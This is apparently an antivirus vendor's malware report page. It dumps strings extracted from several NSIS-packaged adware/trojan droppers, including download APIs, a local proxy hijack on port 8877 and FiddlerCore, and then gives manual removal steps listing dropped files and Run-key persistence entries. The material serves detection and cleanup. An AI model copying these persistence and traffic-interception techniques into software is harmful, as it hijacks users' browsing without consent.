~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
ication Data\apqPAyENSREpdiRdy4l7PC.html
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
Override:<-loopback> || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html
A~loogg2.txt
pdiRdy4l7PC.html
PQPAY~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
tml/fide/lo2qPAyENSREpdiRdy4l7PC.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp
1464376
winonit.exe
4l7PC.exe
1495012
C:\a\qPAyENSREpdiRdy4l7PC.exe
qPAyENSREpdiRdy4l7PC.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
6.0.2900.5512
3215049.bat
dobeARM.exe"
wcheckf.exe
wincheckfe.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
ttps=127.0.0.1:8877
tport3.exe
\Adobe\ARM\1.0\AdobeARM.exe"

qPAyENSREpdiRdy4l7PC.exe_752_rwx_10004000_00001000:

callback%d

wcheckf.exe_1312:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp\FindProcDLL.dll
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
!%[ %S
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
nsd8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
C:\a\wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

wincheckfe.exe_1024_rwx_10004000_00001000:

callback%d

wcheckf.exe_1312_rwx_10004000_00001000:

callback%d

winonit.exe_1304:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp
.reloc
Kernel32.DLL
PSAPI.DLL
MSVCRT.dll
KillProcDLL.dll
u.Uj@
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
\.lR%
g.ZO||k[
C:\a\avv.txt
avv.txt
m\LOCALS~1\Temp\nsuA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp
C:\a\winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

getcap.exe_500:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\a\7za.exe
S~1\Temp\nsnE.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp\System.dll
C:\a\ukey.ini
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp\System.dll
GetCPInfo
MB, # %s =
RAM %s
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Unsupported archive type
-p{Password}: set Password
is not supported archive
Enter password (will not be echoed):
Advapi32.dll
kernel32.dll
update operations are not supported for this archive
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
GetWindowsDirectoryW
E%SsK*X|
, .MN6b
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp
C:\a\getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
H7zCon.sfx
7-Zip cannot load Mapi32.dll
A* * .tar .tar
B* .tar

winonit.exe_1304_rwx_10004000_00001000:

callback%d

getcap.exe_500_rwx_10004000_00001000:

callback%d

vchk.exe_1968:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
C:\a\avchk.txt
avchk.txt
\LOCALS~1\Temp\nsa10.tmp
hk.txt
jamInternetEnhancerApp.exe
21f5f7.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
WajamInternetEnhancerApp.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

vchk.exe_1968_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WMIC.exe:1768
    %original file name%.exe:1588
    taskkill.exe:1268
    taskkill.exe:744
    taskkill.exe:572
    taskkill.exe:628
    taskkill.exe:1200
    taskkill.exe:1920
    taskkill.exe:1924
    taskkill.exe:232
    taskkill.exe:1984
    taskkill.exe:1776
    taskkill.exe:1812
    taskkill.exe:1192
    taskkill.exe:1584
    taskkill.exe:1252
    taskkill.exe:1464
    taskkill.exe:2016
    taskkill.exe:1036
    taskkill.exe:2012
    taskkill.exe:1096
    taskkill.exe:1216
    taskkill.exe:672
    taskkill.exe:1332
    taskkill.exe:120
    taskkill.exe:1932
    taskkill.exe:228
    taskkill.exe:388
    taskkill.exe:1020
    taskkill.exe:1432
    taskkill.exe:1280
    taskkill.exe:1728
    taskkill.exe:1384
    taskkill.exe:860
    taskkill.exe:908
    taskkill.exe:1240
    taskkill.exe:2020
    taskkill.exe:1008
    taskkill.exe:296
    taskkill.exe:292
    taskkill.exe:680
    taskkill.exe:1416

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
    C:\a\ProcessList.txt (1418 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ckkkp[1].htm (324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (715 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\localhost[1].htm (715 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ckkk[1].htm (303 bytes)
    C:\a\1loogg2.txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\System.dll (11 bytes)
    C:\a\1logff.txt (717 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (303 bytes)
    C:\a\vv11111.txt (22012 bytes)
    C:\a\avv.txt (2896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\System.dll (11 bytes)
    C:\a\auur.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uur[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\vv[1].htm (2896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\System.dll (11 bytes)
    C:\a\FiddlerCore.dll (9485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (17 bytes)
    C:\a\zuur.txt (2 bytes)
    C:\a\internetport3.exe (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cki[1].htm (11 bytes)
    C:\a\wcheckf.exe (397 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uniqueqPAyENSREpdiRdy4l7PC[1].htm (10 bytes)
    C:\a\zhho.txt (3 bytes)
    C:\a\qPAyENSREpdiRdy4l7PC.exe (3808 bytes)
    C:\a\zvchk.txt (3 bytes)
    %Program Files%\FastInternet\app.exe (1078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bdcount[1].htm (8 bytes)
    C:\a\winonit.exe (435 bytes)
    C:\a\ayyyyy.txt (11 bytes)
    %Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe (3808 bytes)
    C:\a\ukey.ini (27 bytes)
    %System%\3215049.bat (19 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
    C:\a\zvv.txt (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (5289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
    C:\a\ver.ini (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (13 bytes)
    C:\a\getcap.exe (10027 bytes)
    C:\a\3cMmvL8egY.exe (5873 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
    C:\a\73941422.bat (287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (13 bytes)
    C:\a\wincheckfe.exe (778 bytes)
    C:\a\uniqueqPAyENSREpdiRdy4l7PC.ini (10 bytes)
    C:\a\install.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\vchk[1].htm (1946 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (6 bytes)
    C:\a\avchk.txt (1946 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (6 bytes)
    C:\a\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp\System.dll (11 bytes)
    C:\a\logff.txt (717 bytes)
    C:\a\loogg2.txt (240 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "autoauto" = "3215049.bat"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "rutoauto" = "3215049.bat"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now